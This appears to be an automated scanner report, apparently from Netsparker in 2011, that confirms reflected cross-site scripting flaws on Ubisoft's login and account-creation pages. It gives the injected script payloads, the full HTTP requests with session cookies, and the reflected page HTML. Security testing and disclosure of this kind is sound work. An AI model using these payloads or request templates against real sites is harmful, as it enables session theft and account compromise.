<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x0004DB)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value=&..
- /login/Login.aspx

/login/Login.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
_buttonClicked POST submit
login POST '"--></style></script><script>alert(0x000503)</script>
m_ImageButtonSubmit POST submit
password POST 3
RememberPassword POST 1

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 235
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&_buttonClicked=submit&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000503)%3c%2fscript%3e&m_ImageButtonSubmit=submit&password=3&RememberPassword=1

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13495


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name you entered is invalid. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x000503)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

<..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST '"--></style></script><script>alert(0x00054B)</script>
password POST 3
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST ------
country POST us
_buttonClicked POST submit

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 270
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00054B)%3c%2fscript%3e&password=3&confirmpassword=3&email=netsparker%40example.com&birthdate=------&country=us&_buttonClicked=submit

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="'"--></style></script><script>netsparker(0x00054B)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
